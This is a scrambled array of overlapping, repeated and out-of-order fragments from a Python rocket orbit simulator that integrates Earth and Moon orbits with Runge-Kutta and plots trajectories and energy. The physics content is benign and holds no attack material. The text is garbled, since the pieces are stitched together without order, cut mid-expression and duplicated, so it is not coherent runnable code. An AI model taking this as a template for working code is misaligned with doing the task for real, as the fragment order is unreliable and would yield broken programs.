[ "= PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket", "'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan')", "k4vy = F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1]", "F3(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "-*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import", "def F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt", "* k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x", "energy is the sum of these two # Part A RK4 Implementation for", "= (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\"", "y axis (units are in m/s) (If the previously reccommended altitude is set", "G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y *", "utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\"", "position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color =", "Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal", "of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label =", "h * k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h", "* k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] +", "ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color", "print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0] = vx0", "return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me *", "with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0", "/ (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to", "input(\"Vy = \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y,", "(k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i]", "= Ek[0]+Ep[0] #Total energy is the sum of these two # Part B", "#3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i]", "k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] +", "Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots()", "m/s) (If the previously reccommended altitude is set then start with x =", "k2y + 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) *", "6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius", "axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating", "''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0", "k3x, y[i] + h * k3y) k4vy = F6(x[i] + h * k3x,", "= F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h * k3vy)", "# -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020", "range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i])", "the rocket (kg) rM = 1.737e6 #radius of the moon (m) d =", "ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 =", "= F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] + h", "= 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 =", "= np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational", "(Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1", "set then start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx", "#radius of earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr", "= F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y", "F6(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan')", "is the sum of these two # Part B RK4 Implementation for i", "x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me *", "#mass of the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm", "7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of the rocket", "G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE =", "k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx)", "* k3y) k4vy = F6(x[i] + h * k3x, y[i] + h *", "* (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the", "print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1", "x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y)", "2 * k2x + 2 * k3x + k4x) y[i+1] = y[i] +", "k3y) k4vy = F4(x[i] + h * k3x, y[i] + h * k3y)", "= F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x", "apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)')", "potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these", "the sum of these two # Part B RK4 Implementation for i in", "N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy =", "+ Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)'])", "k2y * 0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i]", "# Distance between Earth and the Moon (m) #dx/dt def F1(vx): return vx", "k2x * 0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i]", "single position variable 'r' v = np.hypot(vx,vy) # Velocities in the x and", "import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable", "Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime')", "ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0],", "of the rocket (kg) rM = 1.737e6 #radius of the moon (m) d", "i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min.", "+ h * k1x * 0.5, y[i] + h * k1y * 0.5)", "print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \")", "= -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the", "v = np.hypot(vx,vy) # Velocities in the x and y directions compounded in", "are in m): (I reccommend starting with x = 7x10^6 and y =", "k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h", "* k2x * 0.5, y[i] + h * k2y * 0.5) #4 k4x", "= y[i] + (h/6) * (k1y + 2 * k2y + 2 *", "Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude", "= F3(x[i] + h * k1x * 0.5, y[i] + h * k1y", "the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color =", "ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy',", "F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h * k3x, y[i]", "vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x and y", "in m): (I reccommend starting with x = 7x10^6 and y = 0)\"\"\")", "* 0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i] +", "N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N),", "= F3(x[i] + h * k2x * 0.5, y[i] + h * k2y", "(units are in m/s) (If the previously reccommended altitude is set then start", "* x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def", "(enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input()", "= \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx,", "reccommended altitude is set then start with x = 0, y = 7500)\"\"\")", "(x,y) print(\"\"\" Please enter initial velocities along the x and y axis (units", "python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05", "two # Part A RK4 Implementation for i in range (0, N-1): #1", "# Part A RK4 Implementation for i in range (0, N-1): #1 k1x", "* 0.5 * k1vy) k2vx = F3(x[i] + h * k1x * 0.5,", "= \") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please", "k3x, y[i] + h * k3y) k4vy = F4(x[i] + h * k3x,", "k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i]", "+ h * k1y * 0.5) k2vy = F6(x[i] + h * k1x", "(-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min.", "of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2)))", "* k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1]", "B RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i])", "= 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0 =", "color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50", "\"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t", "np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0]", "Earth (kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass", "between Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def", "0.5 * k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i]", "0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i] + h", "= 1.737e6 #radius of the moon (m) d = 3.844e8 # Distance between", "rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param", "#mass of the rocket (kg) rM = 1.737e6 #radius of the moon (m)", "y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G)", "-------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)'])", "+ h * 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5", "= 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket", "+ k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y", "vx[i] + (h/6) * (k1vx + 2 * k2vx + 2 * k3vx", "0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy =", "return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y):", "= y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r =", "h * k1x * 0.5, y[i] + h * k1y * 0.5) #3", "h * k1x * 0.5, y[i] + h * k1y * 0.5) k2vy", "Part B RK4 Implementation for i in range (0, N-1): #1 k1x =", "+ 2 * k2y + 2 * k3y + k4y) vx[i+1] = vx[i]", "Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic", "k2vx = F3(x[i] + h * k1x * 0.5, y[i] + h *", "for your rocket (units are in m): (I reccommend starting with x =", "Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is", "* 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy)", "* k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] + h", "Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of", "k3vx = F3(x[i] + h * k2x * 0.5, y[i] + h *", "(-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of", "h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et =", "y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4", "and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \")", "Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] =", "Ek[0]+Ep[0] #Total energy is the sum of these two # Part B RK4", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0", "+ h * k3vy) k4vx = F5(x[i] + h * k3x, y[i] +", "(kg) rM = 1.737e6 #radius of the moon (m) d = 3.844e8 #", "compounded in a single position variable 'r' v = np.hypot(vx,vy) # Velocities in", "color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon", "enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 =", "* k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i] +", "= x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r =", "in the x and y directions compounded in single variable 'v' r[0] =", "= 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") #", "are in m/s) (If the previously reccommended altitude is set then start with", "of the Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2)))", "param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param)", "x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 r", "y[i] + h * k1y * 0.5) k2vy = F6(x[i] + h *", "v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0]", "0 r = np.hypot(x,y) # x and y coordinates compounded in a single", "coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy) # Velocities", "the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy", "Part A RK4 Implementation for i in range (0, N-1): #1 k1x =", "single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2", "0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y =", "total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] =", "0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx", "h * k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h", "Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1", "5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of the moon", "* k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2", "0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i] + h", "= plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color", "Rocket Orbit Simulator! Please select which body you wish your rocket to orbit", "rocket to orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\")", "0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select", "# Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and", "#Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy", "F4(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "* (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1", "in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx =", "N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N),", "k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h *", "k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy", "k3vx = F5(x[i] + h * k2x * 0.5, y[i] + h *", "k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] =", "sum of these two # Part A RK4 Implementation for i in range", "* 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy)", "h * k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 *", "Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides)", "k2vx = F5(x[i] + h * k1x * 0.5, y[i] + h *", "and y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] =", "= F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] + h", "Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit", "h * 0.5 * k1vy) k2vx = F5(x[i] + h * k1x *", "-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return", "F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1] = x[i]", "body you wish your rocket to orbit (enter 1 or 2): \\n 1.", "earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots()", "h * k2x * 0.5, y[i] + h * k2y * 0.5) k3vy", "t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1]", "return vy #dvx/dt def F3(x,y): return -1 * (Me * x * G)", "input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0", "return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence", "+ 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy +", "vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx + 2", "* k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i] +", "orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep,", "+ (h/6) * (k1y + 2 * k2y + 2 * k3y +", "* k3x, y[i] + h * k3y) k4vy = F6(x[i] + h *", "<= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\"", "energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1]", "earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color =", "Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude", "+ h * k2x * 0.5, y[i] + h * k2y * 0.5)", "your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") #", "+ h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) #", "orbit... ''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] =", "0.5, y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i] +", "Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0]", "x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep", "color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label", "+k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy +", "= Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0]", "* k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2 *", "plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx,", "k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i] + h", "F5(x[i] + h * k3x, y[i] + h * k3y) k4vy = F6(x[i]", "Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r)", "y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial", "fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)')", "y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y):", "= F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1] =", "x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0", "analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label =", "= -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the", "= F6(x[i] + h * k2x * 0.5, y[i] + h * k2y", "sum of these two # Part B RK4 Implementation for i in range", "displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color =", "Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash", "color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit", "v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0]", "y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print('''", "* k2vy) k3vx = F3(x[i] + h * k2x * 0.5, y[i] +", "* 0.5) #3 k3x = F1(vx[i] + h * 0.5 * k2vx) k3y", "= Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has", "= F5(x[i] + h * k3x, y[i] + h * k3y) k4vy =", "(-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 =", "which body you wish your rocket to orbit (enter 1 or 2): \\n", "k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2", "def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 *", "* y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 =", "the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1]", "* k1x * 0.5, y[i] + h * k1y * 0.5) k2vy =", "t[0] = 0 r = np.hypot(x,y) # x and y coordinates compounded in", "= np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0]", "Velocities in the x and y directions compounded in single variable 'v' r[0]", "x and y axis (units are in m/s) (If the previously reccommended altitude", "v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy", "F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me", "Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y", "initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y", "(h/6) * (k1x + 2 * k2x + 2 * k3x + k4x)", "= Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0]", "= vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) # x", "r = np.hypot(x,y) # x and y coordinates compounded in a single position", "start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx = \")", "F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] + h *", "+ 2 * k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] +", "k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] +", "k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i] + h", "h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek,", "* G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return", "(x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G)", "* k2x * 0.5, y[i] + h * k2y * 0.5) k3vy =", "Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable", "h * k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx)", "= input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0 y[0] =", "'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy", "\") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') x[0] = x0", "F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i] + h *", "x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0]", "(s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label", "k2y * 0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i]", "h * k2y * 0.5) k3vy = F4(x[i] + h * k2x *", "* G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return", "+ Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") #", "influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) /", "* 0.5 * k2vy) k3vx = F5(x[i] + h * k2x * 0.5,", "np.hypot(x,y) # x and y coordinates compounded in a single position variable 'r'", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] =", "= '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h)", "y[i] + h * k1y * 0.5) k2vy = F4(x[i] + h *", "Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min.", "= \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h =", "(Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon", "the Moon def F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) +", "rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" --------------------------", "plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth)", "Moon def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1", "rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of", "label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color", "= vy0 r = np.hypot(x,y) # x and y coordinates compounded in a", "Alex's Rocket Orbit Simulator! Please select which body you wish your rocket to", "plt.style.use('dark_background') from 